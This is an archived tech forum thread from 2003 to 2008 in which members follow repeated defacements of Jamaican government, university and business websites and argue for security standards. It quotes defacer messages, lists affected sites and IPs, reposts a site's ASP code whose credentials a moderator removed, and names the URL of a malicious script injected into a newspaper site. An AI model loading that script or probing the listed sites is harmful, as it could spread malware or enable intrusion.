Chris
December 17, 2003, 11:03 AM
Nh! No one on this website going attack my almost useless shamelessly plugged website, right? Right? Right??!? :o
Yeah ... riiiiight 8)
deakie
December 17, 2003, 05:39 PM
it look fat and ready for a good pluckin nuh true!..... ;D
ramesh
December 17, 2003, 05:59 PM
it look fat and ready for a good pluckin nuh true!..... ;D
Who going do it, you? ;D ;) :o ::)
(Gulp)
BlackCryptoKnight
April 1, 2004, 09:52 AM
Time has passed, and more Jamaican websites have been hacked and defaced. One of the latest happening on February 21, 2004 when http://www.minilab.gov.jm was defaced.
See the archive of the defacement at http://www.zone-h.org/defacements/mirror/id=962212/
BlackCryptoKnight
April 6, 2004, 06:20 PM
Time has passed, and more Jamaican websites have been hacked and defaced. One of the latest happening on February 21, 2004 when http://www.minilab.gov.jm was defaced.
See the archive of the defacement at http://www.zone-h.org/defacements/mirror/id=962212/
I'm disappointed. The site http://www.minilab.gov.jm has been hacked since at least Feb 21, 2004 and it still is not fixed. It's a Jamaica government site (the Ministry of Labour), and it's not fixed yet. Shame on you government. :-\
Chris
April 6, 2004, 09:19 PM
Just checked and the site seems to be down. Looks like they're "working on it"?
BlackCryptoKnight
April 6, 2004, 09:40 PM
Just checked and the site seems to be down. Looks like they're "working on it"?
Nopes. http://www.minlab.gov.jm gives the following in plain text:
"amarelo was here ! r00t_system defacers crew 2004 ! irc.brasnet.org /j #ry ! sur00t@america.hm ! fuc"
Chris
April 7, 2004, 09:40 AM
Just checked again and this time it's displaying the hacked message. Last night it wasn't coming up at all so probably the "new" website administrators were doing some site maintenance last night ;D Talk about e-squatting ;D
BlackCryptoKnight
April 7, 2004, 09:44 AM
In light of the recent focus on Cybercrime and Information Security, this incident looks really embarrassing for the government. Shame shame shame :-\ :-\ :-X :-X :-X :(
Chris
April 7, 2004, 09:55 AM
It appears that the Ministry is no longer using that url but is now using http://www.lmis-ele.org.jm/. This is probably why it has been left in the cracked state for so long. Probably they should tell http://www.mfaft.gov.jm/Links/links.htm to point to the new URL ???
BlackCryptoKnight
April 7, 2004, 10:32 AM
Jampro also links to it at http://www.investjamaica.com/links/index.php
deakie
April 7, 2004, 01:38 PM
i'm not advocating that idiots be allowed a slap before intervention as this is a bit harsh but without a doubt, those who dont hear and think they are immune, will feel.
this does encourage them to then put in place a proper secure structure. afterall, the main proponents and architects of the net (namely the americans) also had to learn the lesson this way too.
it may yet teach them to have value for their IT staff who do work hard and with limited resources do the best they can.
incidents like this serves to support the need for proper investment and training.
BlackCryptoKnight
April 8, 2004, 12:05 PM
Bwoy deakie, the problem I have is that until they figure things out, they are likely to compromise citizens' sensitive data. That's not a nice thing at all. For a govt. that talks about E-government and E-business, it just looks plain bad.
Nobody from the ministry looks at their own website to even see what happened?
Disgrace beyond words :-\ :( >:(
Chris
April 9, 2004, 07:30 PM
Is this another attack on some of the sites that were defaced last year? http://www.techjamaica.com/tech_forum/index.php?board=27;action=display;threadid=3592
BlackCryptoKnight
April 13, 2004, 10:13 AM
Looks like the other Ministry of Labour website is having problems: http://www.lmis-ele.org.jm
BlackCryptoKnight
April 13, 2004, 11:15 AM
CVM TV news on Sunday night carried the story of the hacking of the Ministry of Labour and Social Security Website:
http://www.cvmtv.com/news/archives/newswatch/archive_Sunday,%20April%2011%202004.html
In the news report the officials at the Ministry claim that the defaced website has been deactivated. Yet it is still online with the defacement. ??? ::) :-\
Methinks some people need a clue.
It's especially embarrassing since the Ministry has "Security" in its title. :-X
The report also says that the defacement took place about a week before. That's not what http://www.zone-h.org has to say about it. According to them, it's been defaced since at least February 21, 2004. :-X
BlackCryptoKnight
April 19, 2004, 06:03 AM
UWI Websites have been hacked and defaced.
http://wwwcardin.uwimona.edu.jm/
http://vhljamaica.uwimona.edu.jm/
It appears to be a mass defacement.
Zone-h.org has archived these defacements at
http://www.zone-h.org/en/defacements/view/id=1157326/ (http://www.zone-h.org/en/defacements/view/id=1157326)
http://www.zone-h.org/en/defacements/view/id=1157325/
:-\
BlackCryptoKnight
April 19, 2004, 09:27 AM
Here's the screen capture
http://gallery.cybertarp.com/albums/userpics/21504/UWI%20hacked%20page.gif
BlackCryptoKnight
April 19, 2004, 09:50 AM
The UWI online student registration system at
http://srs.uwimona.edu.jm:1104/student.htm is now down...
Could it have been hacked too? ??? :-\
Cue
April 19, 2004, 10:07 AM
I believe from time to time, UWI pulls this page to do some info updates.
I wouldnt assume that the page was hacked...at least not right away
BlackCryptoKnight
April 19, 2004, 10:12 AM
I realize that I may have a problem getting to the student registration page from behind my firewall since it runs on port 1104 and access to that port isn't allowed.
However, this morning I tried to get in from home and got back error messages.
Chris
April 19, 2004, 10:14 AM
The two sites are now down, guess they've now realised what's happening.
Arch_Angel
April 19, 2004, 11:15 AM
Why are these guys targeting Jamaican websites?
BlackCryptoKnight
April 19, 2004, 11:36 AM
Strangely, the links to Zone-H.org show different pictures of the defaced website than what we saw this morning up to the time the sites were pulled offline. It could be that the defacers changed their posting after Zone-H.org archived it.
Nastrodamus
April 20, 2004, 03:52 PM
I was beginning to wonder about that.
Why do you think that these sites are now being so targeted?
Is it that the number of persons exploiting websites have increased in this region? Could it be that proper security measures have not been put into play by this region and are now being targeted for this reason?
As I saw one group say "hacking for jesus". I see where these had used holes in IIS etc...?
Can we somehow educate or suggest security measures that can be put in place by these companies to protect our local entity? This would sure boost the interactivity of Techjamaica and the Jamaica IT community.
Nastrodamus
April 20, 2004, 03:53 PM
......but then again it could be interpreted as being presumptuous and overstepping our boundaries. What say you?
BlackCryptoKnight
April 21, 2004, 05:59 PM
Why do you think that these sites are now being so targeted?
Is it that the number of persons exploiting websites have increased in this region? Could it be that proper security measures have not been put into play by this region and are now being targeted for this reason?
Nas, most website defacers and other security breachers are opportunists. They pick on targets more likely to yield good results. They scan blocks of IP addresses looking for vulnerable machines to exploit. I strongly doubt that these defacers responsible for the recent incidents with Jamaican websites were specifically looking for Jamaican websites. They just happened to find some vulnerable boxes ripe and ready for the picking. So pick them they did.
Definitely, there was an absence of security measures on the defaced websites that would have prevented the incidents from occurring. It's also possible that if word gets out that this region is lax when it comes to Internet website security, then people will see it as "low hanging fruit" and exploit the weaknesses.
Can we somehow educate or suggest security measures that can be put in place by these companies to protect our local entity? This would sure boost the interactivity of Techjamaica and the Jamaica IT community.
I thought that's what we've been doing all along ;)
Actually, you have a point. I'll take it a step further to say that there should be legislation which compels Jamaican organizations to adhere to defined standards for data protection - especially if they will be placing citizens' sensitive data online.
This is the practice in other developed nations where E-Business and E-Government are operational.
The US National Standards body - NIST, has guidelines and standards for IT Security. The Canadians have their govt. agency with their own standards (some adapted from NIST).
The UK has theirs. And these countries all have their legislation to whip organizations into shape!
The US has Gramm-Leach-Bliley Act for Financial institutions so they take steps to protect the confidentiality of client data. They have HIPAA Act to protect sensitive healthcare data of patients. They have Sarbanes-Oxley Act to protect the integrity of Financial Statements in companies. The North American Energy Reliability Commission (NERC) has legislation to protect critical Electricity Infrastructure against Cyber attacks.
When are we going to get similar legislation? ???
E-Transaction Act and CyberCrime Act aren't enough.
BlackCryptoKnight
July 1, 2004, 05:08 PM
Did some digging again and found more Jamaican websites that have been hacked and defaced recently.
The new victims are :
The Jamaica Theological Seminary and Caribbean Graduate School Of Theology (http://www.jtscgst.edu.jm)
Here's the link to the archived defaced page (http://www.zone-h.org/defacements/mirror/id=1279523/)
The Jamaica Association for the Deaf (http://jamdeaf.org.jm/)
Here's the link to the archived defaced page (http://www.zone-h.org/defacements/mirror/id=1277088/)
Jamaica Producers Group Ltd. (http://www.jpjamaica.com)
Archived Defacement (http://www.zone-h.org/defacements/mirror/id=1279521/)
Oh...the Ministry of Labour website http://www.minlab.gov.jm is still defaced :-\
rodalembs
July 2, 2004, 11:23 AM
Oh...the Ministry of Labour website http://www.minlab.gov.jm is still defaced :-\
Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is a move afoot to standardize government-based web presence to set standards...i hope they consider security as a significant part of these standards
MiTcHiE
July 4, 2004, 04:31 PM
Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is a move afoot to standardize government-based web presence to set standards...i hope they consider security as a significant part of these standards
I think after it was hacked they stopped using that site altogether and has another. I dont know the link though.
Chris
July 4, 2004, 05:07 PM
I think after it was hacked they stopped using that site altogether and has another. I dont know the link though.
http://www.lmis-ele.org.jm/
MiTcHiE
July 4, 2004, 05:28 PM
Oh thanx Chris
Cue
July 5, 2004, 11:11 AM
Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange
i understand that there is a move afoot to standardize government-based web presence to set standards...i hope they consider security as a significant part of these standards
I used to be on the subcommittee dealing with the implementation of a "govt standard" for websites, however i'm sorry to say that security was the least raised variable in the issue...sad isnt it :( And unfortunately i'm no longer in the island, so i cant make my opinions heard. But i'm sure there are ppl in TechJam that can
CKnight
July 5, 2004, 01:22 PM
I used to be on the subcommittee dealing with the implementation of a "govt standard" for websites, however i'm sorry to say that security was the least raised variable in the issue...sad isnt it :( And unfortunately i'm no longer in the island, so i cant make my opinions heard. But i'm sure there are ppl in TechJam that can
I'm on the committee. What do you want me to say?
BlackCryptoKnight
July 5, 2004, 01:49 PM
I'm on the committee. What do you want me to say?
Gee... where do we start ??? ;)
Seriously though, I think the most beneficial thing is to incorporate planning for security in your development of standards for the websites. You all should examine the various security issues - from secure design, to implementation, to incident handling, and then incorporate these things in all aspects of your decision making. It costs less to incorporate security planning before implementation than dealing with security after things are already set.
The stakes are pretty high when you consider the push govt. has been making about putting govt. services online. We the taxpayers need to be assured that our data and interests are protected when you open up services on the world-wide Internet.
Govt. definitely needs to have a formal Information Security Policy for its internal operations.
BlackCryptoKnight
July 5, 2004, 01:53 PM
Come Now Star...someone must can tell dem fi tek it dung...dem just stop use it and nuh de-commison it...Strange ??? ???
i understand that there is a move afoot to standardize government-based web presence to set standards...i hope they consider security as a significant part of these standards
The Ministry of Labour knows about the defaced website. It's been featured on CVM news already. They spun some PR about the Police Cybercrime Unit being on the case...yadda yadda yadda...
The fact that they've launched a new site is all well and good, but when you have links on other websites (including govt. sites) pointing to a link to the Ministry of Labour which turns out to be a defaced website, it just looks plain embarrassing. :-\
rodalembs
July 5, 2004, 02:46 PM
IMO.. the Technology ministry needs (if it has not already done so) to ensure that government has a standard policy for Information technology (e.g. procurement, training, website design and development and importantly now security). I had the opportunity to visit one of the government entities of a US state where I was given a tour of their IT infrastructure. Now in 2001 this entity was still using Office 97 and NT Workstation and Server and Exchange 5.5 (they had about 2000 users on their network). Well..since the buzz was about win2k and AD I had figured they would have been upgrading too...(since it is US gov and this entity could actually afford it). They told me that all decisions regarding upgrades or infrastructure changes were taken care of at the state IT department and if they needed say a new server they had to coordinate with the state's technology office. It might sound like a lot of bureaucracy, but truth be told it does lead to ordered management of the infrastructure and resources. I think that the government network is not too complex to have some centrality over it. What is the role of FISCAL in all of this? They were once touted as central government's IT department. Are they only involved on the programming side? Should they get involved on the infrastructure and security side?
BTW how many person have had a read of the governments IT strategic plan? What do you think of it?
BlackCryptoKnight
August 13, 2004, 02:54 PM
The Ministry of Labour is really joking now. Their website http://www.minlab.gov.jm has a new defacement up.
Why don't they just take down the server?
Jokers.
BlackCryptoKnight
August 13, 2004, 04:49 PM
Hey People try this out.
Go to http://www.google.com
Enter the following search terms exactly in the google search:
jamaica ministry of labour
What results do you get back? :eusa_shif
ramesh
August 13, 2004, 05:38 PM
And what if you had used "I'm feeling lucky"?
pcchick
August 13, 2004, 05:58 PM
You should try it for "weapons of mass destruction" in google and press "im feeling lucky" and you'll see how lucky you get.
ramesh
August 13, 2004, 06:19 PM
You should try it for "weapons of mass destruction" in google and press "im feeling lucky" and you'll see how lucky you get.
I know of that one from The Screensavers. It was done deliberately, using dubious methods by persons of questionable morals.
rodalembs
September 20, 2004, 03:06 PM
http://www.minlab.gov.jm/....
Hey guys this site is hacked...AGAIN!!.....
BlackCryptoKnight
September 20, 2004, 09:37 PM
http://www.minlab.gov.jm/....
Hey guys this site is hacked...AGAIN!!.....
Breddrin...methinks this site has been designated as a training ground for website defacers because the Ministry of Labour cannot seriously have any intention for really using it. :eusa_snoo
Chris
September 20, 2004, 10:22 PM
LOL, it appears that the Jamaican Gov't is maintaining a breeding ground for hackers by leaving that site online. I wonder if they have some extra space and bandwidth on it? :eusa_thin
rodalembs
September 20, 2004, 11:32 PM
well...boy is how much time this site get hacked? :eusa_thin :eusa_thin
Seriously, Does anyone have any form of association with the Ministry? Someone needs to offer them some help!
BlackCryptoKnight
September 21, 2004, 05:54 AM
well...boy is how much time this site get hacked? :eusa_thin :eusa_thin
Seriously, Does anyone have any form of association with the Ministry? Someone needs to offer them some help!
This is one of the problems with Jamaican govt. Even after CVM did a story on this website being defaced, the Ministry of Labour claimed "they had it under control", "the police were investigating" etc. Not a thing has come out of it.
They know it has been defaced. It has never been fixed up or secured. Hence they obviously don't care.
In light of this, any E-govt or E-business effort by the govt. in my view has NO CREDIBILITY. If they don't care enough to keep their ministry website secure, then they won't care enough to secure my personal data. Neither will they care enough to put things in place so that people can be sure that other Jamaican businesses are taking the right measures to secure citizens personal data.
Nuff mouth talking and no serious action yet again. :eusa_snoo
Zard
September 21, 2004, 11:03 AM
This is one of the problems with Jamaican govt. Even after CVM did a story on this website being defaced, the Ministry of Labour claimed "they had it under control", "the police were investigating" etc. Not a thing has come out of it.
They know it has been defaced. It has never been fixed up or secured. Hence they obviously don't care.
In light of this, any E-govt or E-business effort by the govt. in my view has NO CREDIBILITY. If they don't care enough to keep their ministry website secure, then they won't care enough to secure my personal data. Neither will they care enough to put things in place so that people can be sure that other Jamaican businesses are taking the right measures to secure citizens personal data.
Nuff mouth talking and no serious action yet again. :eusa_snoo
DITTO :eusa_snoo
rodalembs
September 21, 2004, 11:14 AM
folks there is not protection on this site.....trust me!1
The things we found out just by doing some checks today ..boy oh boy!
Chris
September 21, 2004, 11:49 AM
I agree, if they can't secure one website how will they secure my personal info? It appears that there is no "ownership" of things like these when they happen. Ask the police to investigate a hacking incident? PLEASE!! :icon_roll
BlackCryptoKnight
September 21, 2004, 02:19 PM
I agree, if they can't secure one website how will they secure my personal info? It appears that there is no "ownership" of things like these when they happen. Ask the police to investigate a hacking incident? PLEASE!! :icon_roll
Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?
ramesh
September 21, 2004, 02:29 PM
Anyone considered the possibility it is being used as a "honey pot"? :eusa_eh:
BlackCryptoKnight
September 21, 2004, 03:15 PM
Anyone considered the possibility it is being used as a "honey pot"? :eusa_eh:
They wouldn't link to a honeypot on other legitimate websites while purporting to link to a legitimate government website.
Greatis
September 22, 2004, 08:57 AM
This only goes to show the credibility of our esteemed government.
BlackCryptoKnight
December 20, 2004, 10:23 AM
The website http://www.minlab.gov.jm - owned by the Ministry of Labour, has finally been taken offline. This after being hacked and defaced, by who knows how many different persons.
pigeonflight
December 20, 2004, 11:39 AM
In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..
BlackCryptoKnight
December 20, 2004, 11:43 AM
In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..
LoL :eusa_doh:
Our beloved government who wants us to pay our taxes online. :eusa_wall
ProdMaster
December 20, 2004, 01:19 PM
In case you wanted to know what they were running on their site:
http://searchdns.netcraft.com/?host=http%3A%2F%2Fminlab.gov.jm&position=limited&lookup=Wait..
WHAT DA?? ROFL !!! :icon_lol: THIS IS UNBELIEVABLE http://img.photobucket.com/albums/v98/prodmaster/mi_ra.gif
megiddo
December 20, 2004, 09:09 PM
aahhhhh bwoy. first the fake verisign tag, and now win 98? what will they do next, allow ftp and telnet connections?
pigeonflight
December 20, 2004, 10:15 PM
To be fair... netcraft reports the OS as NT/98... generally it's safe to assume that they're running NT, which is slightly better.
carey
December 20, 2004, 10:43 PM
Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?
Maybe they are beginners like me? Only know how to use brains and logic? Nothing about programming? The only cop I know personally who has extensive knowledge of ICT is in the Mobile Reserve.
Cue
December 21, 2004, 07:44 AM
Quote:
Originally Posted by BlackCryptoKnight
Whatever happened to that "Cybercrime Unit"? Where is CITO in all of this? What is the Ministry of Technology doing?
Maybe they are beginners like me? Only know how to use brains and logic? Nothing about programming? The only cop I know personally who has extensive knowledge of ICT is in the Mobile Reserve.
Personally i'd appreciate some feedback as to the depth of the role the cybercrime unit plays...what their procedures are, and as far as what knowledge the members of this task force has...
If anyone could highlight us, even thru the grapevine, i'd appreciate it.
As for govt servers running NT...well what can you say, money talks and a win2k3 server plus licences aint cheap, so most ministries wont upgrade until they absolutely must...and not because they dont wish to but because ...well...money talks!, & IT depts are hardly included in that conversation!
BlackCryptoKnight
April 11, 2005, 03:51 PM
The Met service website was defaced.
http://www.metservice.gov.jm/index.html
Zone H has archived it here - http://www.zone-h.org/en/defacements/view/id=2177011/
Zard
April 11, 2005, 04:02 PM
which spanish speaking techj member can translate the text they defaced it with?
damn from march 16 and it still defaced even now
icuucme
April 11, 2005, 04:12 PM
another jamaican website hacked..hmm. Yeah, for real march 16 kinda long, y dont they change it? I went to the site www.freetranslation.com and this is what it translated to
Racism em full século XXI?
From abolição gives escravatura we seek or fim gave racism, onde temos uma sociedade sem distinção nem discriminação you give pessoas peels ethnic group, mais or that você acha gave system of quotas for black em universities? Você não acha that ao aderirem to isso is being praticado um I tie of racism? Pois to ask quota splits-itself he gave princípio that são lower go you outros by be black? Ou seja, neste modern world onde vivemos exists I tie of racism maior that adoção of systems of quotas?
remember this is a free translation site so u not going to get the best results. still gibberish
Chris
April 11, 2005, 04:12 PM
Actually, it's Portuguese ;)
WHERE VC KEEP ITS RACISM?
Racism in full century XXI?
Since abolition of the slavery we search the end of racism, where we have a society without distinction nor discrimination of the people for the etnia, more what you find of the system of quotas for blacks in university? You do not find that when adhering to this he is being practised a racism act? Therefore to ask for to share of the principle that is inferior to the others for being black? Or either, in this modern world where we live exists act of bigger racism that of quota adoption systems?
Kirby
April 11, 2005, 04:13 PM
wat language is it in??
megiddo
April 11, 2005, 04:15 PM
is tha message for jamaica? or the world?
Zard
April 11, 2005, 04:16 PM
gracias senor Chris :)
icuucme
April 11, 2005, 04:17 PM
Actually, it's Portuguese ;)
lol..oh, that explains the gibberish
don_corleone
August 2, 2006, 12:25 PM
ive noticed since the past two months that local based websites are being attacked by hackers..
the first instance i saw and heard about was over at wheelsjamaica.com when someone mentioned that the local drag racing association website was haxed.. http://www.ndrc.com.jm ..its in the process of being reconstructed, but it was fully defaced and stuff :eusa_shif
another incident i heard about was a website for a company a bredren of mine works for (local of course). an attempt was made to hack it but fortunately one of the admins saw somethin was wrong and took down the site immediately... so that was saved
3rd incident i saw just now JAGDYB, a local racing club...well http://www.jagdyb.com/
you look for yourself...
techjamaica admins, system admins..be on the look out for any kind of suspicious traffic :eusa_wall
death_knight
August 2, 2006, 12:57 PM
thanks a lot don.. on the watch making backups asap.. this other one got hacked the other day too like 2weeks ago, it was jahkno.com i think.
Arch_Angel
August 2, 2006, 01:02 PM
don, I have moved your post into this thread, since we have noticed this problem going on since 2004.
BlackCryptoKnight
August 2, 2006, 02:33 PM
Ahh yes... it's been a while since I've been in this thread.
Ok. More local defacements.
Ministry of Local Government.
http://www.mlgcd.gov.jm/index.php
http://i41.photobucket.com/albums/e253/blackcryptoknight/mlgcdgov.jpg
http://www.mlge.gov.jm/components/com_peoplebook/kuwait.txt
http://i41.photobucket.com/albums/e253/blackcryptoknight/mlgegov.jpg
Check out the list on Zone-H.org (http://www.zone-h.org/index.php?option=com_attacks&Itemid=43&filter=1)
Government can't keep dem tings under control? Zone-H says these sites been defaced since July 9 and July 25.
don_corleone
August 2, 2006, 02:45 PM
don, I have moved your post into this thread, since we have noticed this problem going on since 2004.
wow..its been going on that long?
yikes
Ropy
August 2, 2006, 02:49 PM
How comes none of those sites were posted on zone-h? He's only going after small websites... the ones that'll less likely spend resources trying to track him down.
Nastrodamus
August 2, 2006, 02:58 PM
The Ministry of Local Government site has been a victim for over two years!!!!
Desperately need security ...
bloggins
August 2, 2006, 03:09 PM
The Ministry of Local Government site has been a victim for over two years!!!!
Desperately need security ...
Let's be serious, do you see how some of these government websites look, they definitely did not spend time and money to build them let alone secure them.
seanbee20
August 2, 2006, 04:18 PM
Let's be serious, do you see how some of these government websites look, they definitely did not spend time and money to build them let alone secure them.
I also believe this, most of the government sites look like a 6 year old build them
tommytrouble
August 2, 2006, 05:02 PM
i second that fo real serious thing man i have seen a few gov sites if not all not impressive
MhadbwoY
August 2, 2006, 11:47 PM
OWNAGE :D
Brilliance :eusa_clap
Jovan
August 3, 2006, 01:37 AM
They better keep updating their servers lol cause it look like that was an exploit.
carey
August 3, 2006, 07:33 PM
Take a look at HEART Trust/NTA (http://toolbar.netcraft.com/site_report?url=http://www.heart-nta.org). They seem very secure to me. It seems it's what the government is paying most attention to that is failing. All this focus on the Vani Ts taking them away from the important stuff. [Vani Ts = tourism (government shouldn't be sustaining tourism, should sustain itself), tax (they must be getting enough revenue if them raising them pay again), terrorism (them getting this because them too corrupt!), u certainly can find more to add to the list]
And another point of observation: Flow hosting them!
Addendum
----------
I may be wrong. What does this code do:
<% @ Language="VBScript" %>
<% Response.Buffer=True %>
database code removed
<%
Dim objCon, objRS, idnum
idnum = 0
Set objCon = Server.CreateObject("ADODB.Connection")
Set objRS = Server.CreateObject("ADODB.Recordset")
objCon.Open admin
objRS.Open "SELECT id_num FROM total_users", objCon
If Not objRS.EOF Then
While Not objRS.EOF
idnum = objRS("id_num")
objRS.MoveNext
Wend
idnum = Cint(idnum) + 1
End If
objRS.Close
objRS.Open "SELECT total_hits, id_num FROM total_users WHERE log_date = '" & DateValue(Now) & "'", objCon
If objRS.EOF Then
objRS.Close
objCon.Execute "INSERT INTO total_users VALUES ('" & DateValue(Now) & "', 1, " & idnum & ")"
Else
hits = objRS("total_hits")
objCon.Execute "UPDATE total_users SET total_hits = " & Cint(objRS("total_hits")) + 1 & " WHERE log_date = '" & DateValue(Now) & "'"
objRS.Close
objRS.Open "SELECT log_date FROM total_users WHERE id_num = " & idnum - 1, objCon
If Not objRS("log_date") = DateValue(Now) Then
objCon.Execute "INSERT INTO total_users VALUES ('" & DateValue(Now) & "', " & hits & ", " & idnum & ")"
End If
objRS.Close
End If
Set objRS = Nothing
Set objCon = Nothing
%>
Found it here link removed
Arch_Angel
August 3, 2006, 09:17 PM
Carey, that piece of code contains their password and username to their database. I would suggest instead of posting that info on a public forum, that you find a way to contact them about it.
I have removed the url and the database details from your post.
EDIT: It seems the database info is displayed all over the site. Geez. What's wrong with these people?
carey
August 3, 2006, 10:20 PM
Carey, that piece of code contains their password and username to their database. I would suggest instead of posting that info on a public forum, that you find a way to contact them about it.
I have removed the url and the database details from your post.
EDIT: It seems the database info is displayed all over the site. Geez. What's wrong with these people?
Thanks. Just learning about servers and database myself. Sometimes it's HEART students who develop some things.
Notice that it's defaults they use also.
Arch_Angel
August 3, 2006, 11:07 PM
Thanks. Just learning about servers and database myself. Sometimes it's HEART students who develop some things.
Notice that it's defaults they use also.
I figure if anyone is maintaining the site, they would have noticed it by now. Because all you need to do is, after you enter from the front page, you see the database details on the home page and other subsequent pages.
Can't find any contact details on the site or on Heart's site. Why do so many websites lack contact details? :eusa_wall I mean, even a webmaster email would be adequate.
carey
August 4, 2006, 02:20 PM
Someone be a good samaritan and contact them please? I can't make out any calls on this line, and rain just start fall and I don't have a driver's license so I can't buy credit!
jomo
August 4, 2006, 06:39 PM
I was just informed by sandor that the www.jarealty.com (207.21.234.149) website has been hacked. He also pointed out that the JCS' old website (207.21.234.152) has also been hacked. The hacked sites have the same page with the heading "Command Tribulation - Hacking for Jesus - Ownz with Style". Subsequent checks by me also revealed that www.jamaicaobserver.com (207.21.234.171) was similarly hacked with the same page.
Ok, the list continues ...
www.orcjamaica.com (207.21.234.228) - Office of the Registrar of companies
www.pioj.gov.jm (207.21.234.162) - Planning Institute of Jamaica
www.ugli.com (207.21.234.168)
www.tpdco.org (207.21.234.167) - Tourism Product Development Company
www.jis.gov.jm (207.21.234.181) - Jamaica Information Service
www.infochange.com (207.21.234.129) - Info Exchange (Web Developers)
www.amchamjamaica.org (207.21.234.133) - American Chamber of Commerce
www.jcc.org.jm (207.21.234.151) - Jamaica Chamber of Commerce
www.aaj.com.jm (207.21.234.131) - Airports Authority of Jamaica
www.bigga.com (207.21.234.135) - Bigga soft drinks
www.manley-airport.com.jm (207.21.234.157) - Manley Airport
www.ugigroup.com (207.21.234.176) - UGI group of companies
www.moore.com.jm (207.21.234.174) - Moore business forms
www.cariboutpost.com (207.21.234.138)
www.hawkeye.com.jm (207.21.234.145) - Hawkeye security
www.jamaicancoffee.gov.jm
Based on my knowledge of some of the sites, the common factor is that they were developed, and probably hosted, by Info Exchange Ltd. ???
By the time many of you read this the sites will have been fixed, so here's a screen shot of the page ... http://www.techjamaica.com/images/hacked_page.jpg
add jagdyb.com to the list...
ramesh
August 4, 2006, 08:52 PM
Did anyone notice all those sites IPs start with 207.21.234...?
jomo
August 7, 2006, 02:51 PM
all jamaican sites do
Nastrodamus
August 8, 2006, 09:00 AM
all jamaican sites do
Actually no. Not all jamaican sites do.
Chris
January 9, 2007, 07:09 PM
I came across the hacked site of the Department of Management Studies at UWI Mona. The joke is that they changed the headlines of all the news items except the one that was titled "security" :eusa_thin.
http://img.photobucket.com/albums/v405/juggler111/images/UWIMona_DOMS_hacked-2007-01-09.gif
I reserved posting this until I was able to get this information to relevant persons in the Department so that they could take the necessary recovery steps. They have since removed the hacked headlines, but haven't replaced them with the correct ones as yet.
BlackCryptoKnight
January 10, 2007, 05:44 AM
According to Zone-H.org (http://www.zone-h.org) which tracks website defacements, there were at least 13 Jamaican websites (within the .jm domain) that were hacked and defaced. Among them were
www.Hawkeye.com.jm
news.ncu.edu.jm
manchesterpc.gov.jm
clarendonpc.gov.jm
mlgcd.gov.jm
ndrc.com.jm and
forrestry.gov.jm
What will 2007 bring?
Edit: Ok, 2007 brings UWI getting hacked.
selasieye
January 10, 2007, 10:46 AM
UWI get hacked regular, i remember when they launched the updated site and got hacked the same day..........all the links pointed to some porn sites......
Arch_Angel
February 2, 2007, 09:50 PM
add jagdyb.com to the list...
You mean since August last year, no one at jagdyb.com has removed the hacked page or anything? :thumbsdown: http://jagdyb.com/forum/
megiddo
May 9, 2007, 09:42 AM
no they were just hacked again, it was working up to last week
many other sites have been hacked this week as well,
even my personal company domain, after i checked it out, they hacked all the sites on the same server. I blame myself for not checking the settings but apparently the hosting provider leaves on anonymous ftp by default, that truly upset me, I thought all these things are turned off by default, oh well, never again.
blindz
October 16, 2007, 11:03 AM
Don't know if this was mentioned newhere else, but the national land agency website has been hacked. http://www.nla.gov.jm instead of showing its proper page, its now being redirected to an idle animation
zRo ToLeRaNcE
October 16, 2007, 11:26 AM
Why do I have the feeling that is Blindz do it?
blindz
October 16, 2007, 11:33 AM
me.....if it was me who did it I wud have redirected it to something more ermmm.... yeah
mjj4363
October 16, 2007, 02:43 PM
To see what the hacked sites looked like, use http://www.archive.org/web/web.php
scary what people do
d_skillz
October 18, 2007, 10:57 PM
One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...
mjj4363
October 19, 2007, 12:09 AM
One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...
Why such low level sites? Hackers look for security flaws in sites, sometimes it's hard to find a website that has not been patched or secured. also attacks on smaller government sites has taken place in the past by former workers (IT workers, etc.)
Low level sites sometimes have low level security making it easy to hijack the site and recode it or redirect it.
zRo ToLeRaNcE
October 19, 2007, 10:00 AM
One thing I dont get, what's the point of spoofing these low-level websites, if these Brazillian's or whateva were any good redirect NASA or CIA homepage...
Think...because those sites will get you tracked down and prosecuted.
delly_jm
October 19, 2007, 06:37 PM
Alot more are probably hacked but just not announced...so maybe someone has ur personal data
Chris
October 20, 2007, 09:29 AM
Alot more are probably hacked but just not announced...so maybe someone has ur personal data
I seriously doubt that many (if any) Jamaican websites that have been hacked contained any personal data, and if they did then it's probably nothing more than names and email addresses.
megiddo
October 22, 2007, 01:09 AM
I seriously doubt that many (if any) Jamaican websites that have been hacked contained any personal data, and if they did then it's probably nothing more than names and email addresses.
you would be surprised u kno chris, found a flaw once on a local bank's website that had a little more than that, and even after alerting them about it and meeting with them they still havent fixed it, imagine that!
Chris
October 22, 2007, 06:26 AM
you would be surprised u kno chris, found a flaw once on a local bank's website that had a little more than that, and even after alerting them about it and meeting with them they still havent fixed it, imagine that!
oooooookay then .... I hope I'm not a customer of that bank :eusa_hand
Arch_Angel
July 23, 2008, 04:41 AM
The Jamaica Observer seems to have been hacked...again.
Doesn't seem to have done a whole lot of defacing from what I can see (or maybe it was in the middle of doing the defacing) but getting errors on the cartoon page. And also the Related Links script at the bottom of each news article is showing the following text:
hacked by ADANALI - GeCeCi ( TurkStorm - NetDevilz )
The hacker seems to be trying to get the following javascript to load on the site:
http://www.jvke.ru/ngg.js
Does the Observer webmaster need someone to look over their ASP scripts for potential vulnerabilities? Because this is getting too frequent.
BlackCryptoKnight
July 23, 2008, 05:58 AM
http://i41.photobucket.com/albums/e253/blackcryptoknight/observerhacked1.jpg
http://i41.photobucket.com/albums/e253/blackcryptoknight/observerhacked2.jpg
http://i41.photobucket.com/albums/e253/blackcryptoknight/firefoxnoscript.jpg
Imagine if someone set this thing up to infect visitors with malware? Thank God for Firefox and the NoScript extension.
Arch_Angel
July 23, 2008, 06:36 AM
